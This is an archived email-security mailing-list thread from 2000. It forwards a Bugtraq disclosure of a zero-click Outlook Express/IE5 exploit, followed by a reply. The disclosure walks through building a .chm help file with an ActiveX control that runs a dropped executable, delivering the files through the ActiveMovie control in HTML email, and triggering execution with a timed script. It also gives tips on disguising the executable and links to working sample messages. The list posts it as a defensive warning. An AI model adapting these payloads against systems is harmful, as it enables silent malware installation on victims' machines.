[Esa-l] ALERT: MICROSOFT SECURITY FLAW? (forwarded from bugtraq)

John D. Hardin jhardin at wolfenet.com
Thu May 18 21:20:10 PDT 2000


Okay, folks, a working example of an exploit that installs *and runs*
an executable via email *WITHOUT* user intervention has just been
posted to Bugtraq.

MAKE SURE that "*.chm" is in your poisoned executables list, and that
your MANGLE_EXTENSIONS setting (if you're overriding the default)
includes "chm".

--
 John Hardin KA7OHZ   ICQ#15735746   http://www.wolfenet.com/~jhardin/
 jhardin at wolfenet.com      pgpk -a finger://gonzo.wolfenet.com/jhardin
  768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76=20
 1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
  "Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
  does quite what I want. I wish Christopher Robin was here."
				-- Peter da Silva in a.s.r
-----------------------------------------------------------------------
   164 days until Daylight Savings Time ends

---------- Forwarded message ----------
Date: Mon, 15 May 2000 18:37:31 -0700
From: "http-equiv at excite.com" <http-equiv at excite.com>
To: BUGTRAQ at SECURITYFOCUS.COM
Subject: MICROSOFT SECURITY FLAW?

Saturday, May 13, 2000=20

MICROSOFT SECURITY FLAW?

Silent delivery and installation of an executable on a target computer. N=
o
client input other than opening an email or newsgroup post.

1. Using the following this can be accomplished with the default
installation of Windows 95 and 98 and Internet Explorer 5 browsers and
accompanying mail/news clients

2. The key component from Georgi Guninski=20

http://www.nat.bg/~joro/wordpad-desc.html

3. Secondary component comprises a pre-installed ActiveX control directly
from Microsoft. This control and a variety of similar demonstrations have
been shown to Microsoft over 18 months ago

What to do:

A

(a) Manufacture a *.chm file. The following kit from Microsoft is free an=
d
very easy to use Microsoft=AE HTML Help:

http://msdn.microsoft.com/library/tools/htmlhelp/wkshp/download.htm

(b) Construct a new *.chm file inputting the ActiveX link control as
follows:

<DEFANGED_OBJECT id=3DAA classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003=
b7a11"
  width=3D100 height=3D100>
 <PARAM name=3D"Command" value=3D"ShortCut">
<PARAM name=3D"Button" value=3D"Bitmap:shortcut">
 <PARAM name=3D"Item1" value=3D",C:\WINDOWS\TEMP\MALWARE.exe,">
  <PARAM name=3D"Item2" value=3D"273,1,1">
</OBJECT>

<DEFANGED_SCRIPT>

AA.Click();
</SCRIPT>=20

(c) The control itself is quite sensitive to manipulation, the above
represents the bare minimum to run.=20

(d) Input the path of the executable you intend to run as in PARAM
name=3D"Item1" above. In order to disguise the running of the executable =
it is
suggested to not to give it a silly name, rather something that is famili=
ar
to the operating system e.g. microsoftagent.exe etc.=20

(e) While constructing the *.chm, it is possible to both minimise and off=
set
the location of the *.chm file once opened. For example while under
construction you can set the size of the help window and its location -
using the auto resizer in Microsoft=AE HTML Help, drag the sizer to the
smallest possible size. Although setting the size requires clicking OK
inside the autosizer, dragging to minimal size and hitting ENTER will
register the setting. Secondly offset the location of the file by inputti=
ng
say 2000 , 2000, this should suffice in it opening off-screen on any size
monitor.=20

(f) Once you have compiled the *.chm test its functionality by placing th=
e
executable in your temp file and open the *.chm - it should run the
executable.=20

Now how do we place this on the target computer?

B.

(a) Simply by opening an email message or newsgroup post. The client does
nothing. They receive an email  open it or read a newsgroup post and that=
 is
all.  Both the *.exe and *.chm are transferred silently and immediately t=
o
the temp folder once the email or newsgroup post is open.

How so?

(b) It is possible to embed almost anything in both html email and html
news. Current versions of Outlook Express 5 inspect what is being embedde=
d
is in fact the correct file e.g. <img src=3D"abc.doc"> will not embed bec=
ause
a *.doc is obviously not an image file. Internet Explorer 4 and accompany=
ing
Outlook Express 4 does allow for this, similarly Netscape Messenger also
allows for this. Nevertheless, through proprietary JavaScript and VBscrip=
t,
it is possible to deliver an intact file to the target computer's temp
folder, however with a file name given by the computer e.g. 000321.doc. T=
his
does not serve the purpose of running the *.chm with the file name explic=
it
as above.=20

(c) The Microsoft Active Movie Control (AMC) pre-registered and
pre-installed on all Internet Explorer 5 computers does. The very simple
scripting to do this is as follows:=20

<DEFANGED_OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A hei=
ght=3D1
style=3D"DISPLAY: none" width=3D1>

<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.chm">

<DEFANGED_OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A hei=
ght=3D1
style=3D"DISPLAY: none" width=3D1>

<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.exe">=20

(d) This control too is very sensitive and the complete path must be
inserted in order for it to embed in the html email message or html news
post.

(e) Finally, in the body of the html email or html news post the followin=
g
simple JavaScript is required to set off everything:

<DEFANGED_SCRIPT>

setTimeout('window.showHelp("c:/windows/temp/MALWARE.chm");',15000);

</SCRIPT>

Sufficient delay must be allowed for the news post or email message and
transference of both the executable and *.chm files to be delivered to th=
e
target computers temp file before execution is called.

What will happen?

When the email or news post is opened, the embedded *.chm and *.exe will
automatically and silently be transferred to the client temp folder, inta=
ct
and with the given names. Default locations on all machines calls for the
temp folder to be at C:\windows\temp. The AMC control, will deposit the t=
wo
files to wherever the temp folder is located, if you have changed the
location, these two files will still be delivered there, however because =
the
*.chm file is constructed to seek out the *.exe in the default location, =
it
will fail. Likewise so will the script in the html email message or news
post. Hence, this will only work on default OS installs.=20

Once the news post or email has been opened or even previewed via Outlook=
 or
Outlook Express preview pane, the two files are delivered to the temp
folder, sufficient time elapses when the script in the html message calls
the *.chm which opens silently and minimised in the task bar (because we
have instructed it to open at the minimum size and off-set 2000, 2000), o=
nce
opened it, the ActiveX link control in it, runs the executable.=20

Everything is instantaneous, no need for a reboot and no need for user
interaction other than opening the email (or simply previewing it) or the
newsgroup post. Needless to say once the executable is running, the damag=
e
is done. And no Windows Scripting Host (WSH) involved.=20

The only solution is to relocate the temp folder and/or set scripting and
ActiveX controls to the highest possible settings. The default settings d=
o
not ask for permission.=20

Below represents a working example. The executable incorporated is a
harmless joke program. In order to run it, save the entire example as eit=
her
*.nws or *.eml and click on it:=20

note: 1/ on high speed machines and i-connections with IE5, clicking the
links below will allow for viewing of these news and mail files in the
browser (technically known as mhtml), with the same effect. Slower machin=
es
and i-connections might want to save to disk and open from there.
Additionally saving to disk and opening will allow for viewing in the mai=
l
or news client.

note: 2/ it is not necessary to run this through html mail or news, apply=
ing
all the above directly on the web results in the same.

Right-click and save to desktop

Mail:  http://members.xoom.com/malware/help.eml  89KB

News: http://members.xoom.com/malware/help.nws  89KB
=20



=2E





_______________________________________________________
Get 100% FREE Internet Access powered by Excite
Visit http://freelane.excite.com/freeisp



Return-Path: <owner-esa-l at merlin.spconnect.com>
Delivered-To: esa-l at spconnect.com
Received: from lariat.org (lariat.org [12.23.109.2])
	by merlin.spconnect.com (Postfix) with SMTP id 35A6FBFE8
	for <esa-l at spconnect.com>; Thu, 18 May 2000 23:07:49 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org at lariat.org [12.23.109.2])
	by lariat.org (8.9.3/8.9.3) with ESMTP id AAA07224;
	Fri, 19 May 2000 00:07:28 -0600 (MDT)
Message-Id: <4.3.1.2.20000519000546.04b47200 at localhost>
X-Sender: brett at localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Fri, 19 May 2000 00:07:23 -0600
To: "John D. Hardin" <jhardin at wolfenet.com>,
	Email Security Announce list <esa-l at spconnect.com>
From: Brett Glass <brett at lariat.org>
Subject: Re: [Esa-l] ALERT: MICROSOFT SECURITY FLAW? (forwarded from
  bugtraq)
In-Reply-To: <Pine.LNX.4.10.10005182114080.28640-100000 at gypsy.rubyriver.
 com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: esa-l-admin at spconnect.com
Errors-To: esa-l-admin at spconnect.com
X-BeenThere: esa-l at spconnect.com
X-Mailman-Version: 2.0beta2
Precedence: bulk
List-Id: Email Security  <esa-l.spconnect.com>

John:

And I thought I was going to get some sleep tonight! I suspect that
it will be less than a day before we see a worm based on this tearing
up the Internet. Gads.

--Brett Glass

At 10:20 PM 5/18/2000, John D. Hardin wrote:
   

>Okay, folks, a working example of an exploit that installs *and runs*
>an executable via email *WITHOUT* user intervention has just been
>posted to Bugtraq.
>
>MAKE SURE that "*.chm" is in your poisoned executables list, and that
>your MANGLE_EXTENSIONS setting (if you're overriding the default)
>includes "chm".
>
>--
>  John Hardin KA7OHZ   ICQ#15735746   http://www.wolfenet.com/~jhardin/
>  jhardin at wolfenet.com      pgpk -a finger://gonzo.wolfenet.com/jhardin
>   768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76 
>  1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
>-----------------------------------------------------------------------
>   "Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
>   does quite what I want. I wish Christopher Robin was here."
>                                 -- Peter da Silva in a.s.r
>-----------------------------------------------------------------------
>    164 days until Daylight Savings Time ends





More information about the esd-l mailing list